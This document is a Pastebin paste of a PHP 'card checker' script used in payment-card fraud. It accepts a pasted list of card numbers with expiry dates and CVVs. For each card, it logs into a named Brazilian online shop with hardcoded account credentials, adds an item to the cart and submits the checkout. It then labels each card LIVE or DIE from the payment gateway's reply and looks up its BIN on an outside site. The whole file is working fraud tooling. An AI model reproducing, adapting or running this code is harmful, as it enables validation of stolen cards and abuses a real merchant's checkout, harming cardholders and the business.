Advertisement
s0nyc

checkers0nyc.php

Jan 18th, 2017
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.19 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. session_start();
  4. set_time_limit(9999999);
  5. $login='buceta';
  6. $password='buceta';
  7. $auth=1;
  8. $style='<STYLE>BODY{background-color: #000000; background: url(http://static.tumblr.com/nkwi30s/VGTm2ure9/bg_vans.gif);color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #121214;font-size: 8pt;color: #C1C1C7;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
  9. $header='<html><head><link rel="SHORTCUT ICON" href="http://static.tumblr.com/nkwi30s/VGTm2ure9/bg_vans.gif"><title>Checker Priv8 Area !</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
  10. $footer='</body></html>';
  11. if(@$_POST['action']=="exit")unset($_SESSION['an']);
  12. if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
  13. if($_SESSION['an']==0){
  14. echo $header;
  15. echo '<br><center><tr><td colspan="2" align="center"><strong>PRIVATE AREA VANSCHK</strong></td></tr><br><br>';
  16. echo '<table><form method="POST"><tr><td>Username: </td><td><input type="text" name="login" value=""></td></tr><tr><td>Password: </td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
  17. echo $footer;
  18. exit;}
  19. ?>
  20.  
  21. <html>
  22. <head>
  23. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
  24. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">
  25. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  26. <meta charset="UTF-8">
  27. <title>GO CHECKER</title>
  28. </style>
  29. </head>
  30.  
  31. <body>
  32. <body bgcolor="#FFFFFF" text="#000000" background="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQboISRSoQwjuAe3feU1o8DL7g4RxVhDF9p5wg6XtxNCISBKEuS">
  33. <center>
  34. <h2><strong>VANSCHK</h2>
  35. <form name="cclist" method="POST">
  36. <textarea class="form-control" style="width: 300px; height:300px;" name="cclist" cols="150" rows="20" placeholder="5478749034465009|08|2021|000"><?php if(isset($_POST['setParamList'])){ echo $_POST['setParamList']; }?></textarea><br><br>
  37. <input class="btn btn-primary" type="submit" value=" [ GO ] ">
  38. </form>
  39. </center>
  40. </body>
  41. </html>
  42.  
  43. <?php
  44. include("produto.php");
  45. error_reporting(0);
  46. set_time_limit(0);
  47. function _curl($url,$post="",$usecookie = false) {
  48. $ch = curl_init();
  49. if($post) {
  50. curl_setopt($ch, CURLOPT_POST ,0);
  51. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  52. }
  53. curl_setopt($ch, CURLOPT_URL, $url);
  54. curl_setopt($ch, CURLOPT_HEADER, 0);
  55. curl_setopt($ch, CURLOPT_NOBODY, false);
  56. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  57. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30");
  58. //curl_setopt($ch, CURLOPT_ENCODING, 'gzip');
  59. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  60. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  61. if ($usecookie) {
  62. curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
  63. curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
  64. }
  65. // curl_setopt($ch, CURLOPT_REFERER, 'https://www.camuflagemairsoft.com.br/customer/account/login/'); //REFERER DA SEGUNDA CHAMADO
  66. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  67. $result = curl_exec ($ch); // print aki
  68. curl_close ($ch);
  69. return $result;
  70. }
  71.  
  72.  
  73.  
  74. function percent($num_amount, $num_total) {
  75. $count1 = $num_amount / $num_total;
  76. $count2 = $count1 * 100;
  77. $count = number_format($count2, 0);
  78. return $count;
  79. }
  80.  
  81. function getStr($string,$start,$end){
  82. $str = explode($start,$string);
  83. $str = explode($end,$str[1]);
  84. return $str[0];
  85. }
  86.  
  87. function checkMon($date,$type){
  88. $len = strlen($date);
  89. if ($type == 2){
  90. if($len == 2){
  91. return $date;
  92. }
  93. elseif($len == 1){
  94. switch($date){
  95. case '01': $date='1'; break;
  96. case '02': $date='2'; break;
  97. case '03': $date='3'; break;
  98. case '04': $date='4'; break;
  99. case '05': $date='5'; break;
  100. case '06': $date='6'; break;
  101. case '07': $date='7'; break;
  102. case '08': $date='8'; break;
  103. case '09': $date='9'; break;
  104.  
  105. }
  106. }
  107. return $date;
  108. }
  109. elseif ($type == 1){
  110. if($len == 2){
  111. switch ($date){
  112. case '1': $date='1'; break;
  113. case '2': $date='2'; break;
  114. case '3': $date='3'; break;
  115. case '4': $date='4'; break;
  116. case '5': $date='5'; break;
  117. case '6': $date='6'; break;
  118. case '7': $date='7'; break;
  119. case '8': $date='8'; break;
  120. case '9': $date='9'; break;
  121. case '10': $date='10'; break;
  122. case '11': $date='11'; break;
  123. case '12': $date='12'; break;
  124. }
  125. return $date;
  126. }
  127. elseif($len == 1) return $date;
  128. }
  129. else return false;
  130. }
  131.  
  132.  
  133. function checkYear($date,$type){
  134. $len = strlen($date);
  135. if($type == 4){
  136. if($len == 4) return $date;
  137. elseif($len == 2) return "20".$date;
  138. }
  139. elseif($type == 2){
  140. if($len == 2) return $date;
  141. elseif($len == 4) return substr($date,-2);
  142. }
  143. else return false;
  144. }
  145.  
  146. function multi_explode($pattern, $string, $standardDelimiter = ';'){
  147. $string = preg_replace(array($pattern, "/{$standardDelimiter}+/s"), $standardDelimiter, $string);
  148. return explode($standardDelimiter, $string);
  149. }
  150.  
  151. function info($ccline,$type){
  152. $iscvv = 1;
  153. $pattern = '/[:\|\\\\\/\s]/';
  154. $line = multi_explode($pattern,$ccline);
  155.  
  156. $typemy = explode(" ",$type);
  157. $typem = strlen($typemy[0]);
  158. $typey = strlen($typemy[1]);
  159.  
  160. $AE = "AE";
  161. $VS = "VS";
  162. $MC = "MC";
  163. $DS = "DS";
  164.  
  165. foreach($line as $col){
  166. if(is_numeric($col)){
  167. switch(strlen($col)){
  168. case 15:
  169. if(substr($col,0,1)==3){
  170. $ccnum['num'] = $col;
  171. $ccnum['type'] = $AE;
  172. }
  173. break;
  174. case 16:
  175. switch(substr($col,0,1)){
  176. case '4':
  177. $ccnum['num'] = $col;
  178. $ccnum['type'] = $VS;
  179. break;
  180. case '5':
  181. $ccnum['num'] = $col;
  182. $ccnum['type'] = $MC;
  183. break;
  184. case '6':
  185. $ccnum['num'] = $col;
  186. $ccnum['type'] = $DS;
  187. break;
  188. }
  189. break;
  190. case 1:
  191. if (($col >= 1) and ($col <=12) and (!isset($ccnum['mon']))) $ccnum['mon'] = checkMon($col,$typem); break;
  192. case 2:
  193. if (($col >= 1) and ($col <=12) and (!isset($ccnum['mon']))){
  194. $ccnum['mon'] = checkMon($col,$typem);
  195. }
  196. elseif (($col >= 2009) and ($col <= 2027) and (isset($ccnum['mon'])) and (!isset($ccnum['year']))) $ccnum['year'] = checkYear($col,$typey);
  197. break;
  198. case 4:
  199. if (($col >= 2009) and ($col <= 2027) and (isset($ccnum['mon']))) $ccnum['year'] = checkYear($col,$typey);
  200. elseif ((substr($col,0,2) >= 1) and (substr($col,0,2) <=12) and (substr($col,2,2)>= 2009) and (substr($col,2,2) <= 2027) and (!isset($ccnum['mon'])) and (!isset($ccnum['year']))){
  201. $ccnum['mon'] = checkMon(substr($col,0,2),$typem);
  202. $ccnum['year'] = checkYear(substr($col,-2),$typey);
  203. }
  204. else $ccv['cv4'] = $col;
  205. break;
  206. case 6:
  207. if ((substr($col,0,2) >= 1) and (substr($col,0,2) <=12) and (substr($col,2,4)>= 09) and (substr($col,2,4) <= 27)){
  208. $ccnum['mon'] = checkMon(substr($col,0,2),$typem);
  209. $ccnum['year'] = checkYear(substr($col,-2),$typey);
  210. }
  211. break;
  212. case 3:
  213. $ccv['cv3'] = $col;
  214. break;
  215. }
  216. }
  217. }
  218. if($iscvv == 1){
  219. if ($ccnum['type'] == $amex) $ccnum['cvv'] = $ccv['cv4'];
  220. else $ccnum['cvv'] = $ccv['cv3'];
  221. return $ccnum;
  222. }
  223. else return $ccnum;
  224. }
  225. function inStr($s,$as){
  226. $s=strtoupper($s);
  227. if(!is_array($as)) $as=array($as);
  228. for($i=0;$i<count($as);$i++) if(strpos(($s),strtoupper($as[$i]))!==false) return true;
  229. return false;
  230. }
  231.  
  232. if ($_POST['cclist']){
  233. global $cookie;
  234. $cookie = tempnam('tmp','avo'.rand(1000000,9999999).'tmp.txt');
  235.  
  236. $cclive = "";
  237. $ccdie = "";
  238. $ccerr = "";
  239. $cccant = "";
  240. $uncheck = "";
  241. $limit = "";
  242.  
  243. $cclist = trim($_POST['cclist']);
  244. $cclist = str_replace(array("\\\"","\\'"),array("\"","'"),$cclist);
  245. $cclist = str_replace("\r\r","\r",$cclist);
  246. $cclist = str_replace("\n\n","\n",$cclist);
  247. $cclist = explode("\n",$cclist);
  248.  
  249.  
  250. $STT = 0;
  251. $TOTAL = count($cclist);
  252.  
  253. for($i=0;$i<count($cclist);$i++){
  254. $ccnum = info($cclist[$i],"xx yy");
  255. $type = $ccnum['type'];
  256. $ccn = $ccnum['num'];
  257. $ccmon = $ccnum['mon'];
  258. $ccyear = $ccnum['year'];
  259. $cvv = $ccnum['cvv'];
  260.  
  261. if ($ccn){
  262. $STT++;
  263.  
  264. $url2 = "https://www.acessoriosmotos.com.br/customer/account/login/";
  265. $s = _curl($url2,"",$cookie);
  266.  
  267.  
  268. $url = "https://www.acessoriosmotos.com.br/customer/account/loginPost/";
  269. $post = "login%5Busername%5D=wakkadoidao%40gmail.com&login%5Bpassword%5D=jc43193454&send=";
  270. $s = _curl($url,$post,$cookie);
  271.  
  272.  
  273. $url3 = "http://www.acessoriosmotos.com.br/checkout/cart/add/uenc/aHR0cDovL3d3dy5hY2Vzc29yaW9zbW90b3MuY29tLmJyL2NhcGFjZXRlcy92aXNlaXJhcy1wYXJhLWNhcGFjZXRlcy92aXNlaXJhLXByby10b3JrLWZ1bWUtby1wYXJhLWNhcGFjZXRlcy1ldm9sdXRpb24tNzg4LTFnLTJnLTNnP19fX1NJRD1V/product/13669/";
  274. $s = _curl($url3,"",$cookie);
  275.  
  276.  
  277. $url4 = "https://www.acessoriosmotos.com.br/onestepcheckout/ajax/set_methods_separate/";
  278. $post = "shipping_method=correios_41068&payment_method=mundipagg_api_cartao&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BccNumber%5D=&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BholderName%5D=&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BccCid%5D=&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5Bsave%5D=1&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BnumeroParcelas%5D=&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BccType%5D=&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BexpirationMonth%5D=&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BexpirationYear%5D=";
  279. $s = _curl($url4,$post,$cookie);
  280.  
  281.  
  282. $url8 = "https://www.acessoriosmotos.com.br/onestepcheckout/";
  283. $post = "billing_address_id=2305&billing%5Bfirstname%5D=jose&billing%5Blastname%5D=doido+silva&billing%5Bcountry_id%5D=BR&billing%5Buse_for_shipping%5D=1&shipping_address_id=&shipping%5Baddress_id%5D=&shipping%5Bpostcode%5D=&shipping%5Bfirstname%5D=&shipping%5Blastname%5D=&shipping%5Btelephone%5D=&shipping%5Bfax%5D=&envio_endereco_tipo=&envio_endereco_logradouro=&envio_endereco_numero=&envio_endereco_complemento=&shipping%5Bstreet%5D%5B%5D=&shipping%5Bstreet%5D%5B%5D=&shipping%5Bstreet%5D%5B%5D=&shipping%5Bcountry_id%5D=&shipping%5Bcity%5D=&shipping%5Bregion_id%5D=&shipping%5Bregion%5D=&shipping_method=correios_41068&payment%5Bmethod%5D=mundipagg_api_cartao&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BnumeroParcelas%5D=1&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BccType%5D=$type&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BccNumber%5D=$ccn&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BholderName%5D=jose+c+d+eoliviera&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BexpirationMonth%5D=$ccmon&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BexpirationYear%5D=$ccyear&payment%5Bmundipagg_api_cartao%5D%5BfirstCard%5D%5BccCid%5D=$cvv&osc_summary%5B19172%5D%5Bqty%5D=1&onestepcheckout-couponcode=";
  284. $s = _curl($url8,$post,$cookie);
  285.  
  286.  
  287.  
  288.  
  289. if(inStr($s,"Stone|1000")){
  290.  
  291. echo "$STT/$TOTAL | <div class='row'> <div class='col-md-12'> <div class='alert alert-danger'> <font color=red>DIE | ".$cclist[$i]." "." \n</font> by VANSCHK\n</font><br></div> </div> </div>";
  292. $cclive .= $cclist[$i]."\n";
  293. }
  294.  
  295.  
  296. elseif(inStr($s,"sdauhhudaohsda")){
  297.  
  298. echo "$STT/$TOTAL | <div class='row'> <div class='col-md-12'> <div class='alert alert-info'> <font color=red>LIVE | ".$cclist[$i]." "." | $binchecker <font color=green> by VANSCHK</font><br></div> </div> </div>";
  299. $cclive .= $cclist[$i]."\n" ;;
  300. }
  301. elseif(inStr($s,"enderkkkkkke")){
  302.  
  303. echo "$STT/$TOTAL | <div class='row'> <div class='col-md-12'> <div class='alert alert-info'> <font color=red>CAIU LOGIN | ".$cclist[$i]." "." | $info <font color=blue> by VANSCHK</font><br></div> </div> </div>";
  304. $cclive .= $cclist[$i]."\n" ;;
  305. }
  306.  
  307. elseif(inStr($s,"kkakdkaj")){
  308.  
  309. echo "$STT/$TOTAL | <div class='row'> <div class='col-md-12'> <div class='alert alert-info'> <font color=red>ANO INCORRETO USAR SOMENTE DOIS DIGITOS | ".$cclist[$i]." "." | <font color=blue> by VANSCHK</font><br></div> </div> </div>";
  310. $ccdie .= $cclist[$i]."\n" ;;
  311. }
  312.  
  313.  
  314. elseif(inStr($s,"Stone|0000")){
  315.  
  316. $bin = substr($ccn, 0, 6);
  317. $link = "http://bins.pro/search?action=searchbins&bins=".$bin."&bank=&country=";
  318. $s = _curl($link);
  319. $q = explode('</td>', $s);
  320. $pais = $q[42];
  321. $bandeira = $q[43];
  322. $cardtype = $q[44];
  323. $level = $q[45];
  324. $bank = $q[46];
  325. $binchecker = " [".$pais." - ".$bandeira." ".$cardtype." ".$level." ".$bank."] ";
  326.  
  327. echo "$STT/$TOTAL | <div class='row'> <div class='col-md-12'> <div class='alert alert-danger'> <font color=green>LIVE | ".$cclist[$i]." "." | $binchecker by VANSCHK\n</font><br></div> </div> </div>";
  328. $ccdie .= $cclist[$i]."\n";
  329. }
  330.  
  331. else{
  332.  
  333. echo "$STT/$TOTAL | <div class='row'> <div class='col-md-12'> <div class='alert alert-danger'> <font color=red>DIE | ".$cclist[$i]." "." $info \n</font> <font color=red> by VANSCHK</font><br></div> </div> </div>";
  334. $cccant .= $cclist[$i]."\n" ;;
  335. }
  336.  
  337. }
  338. flush();
  339. }
  340. unlink($cookie);
  341.  
  342. ?>
  343.  
  344. <?php }?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement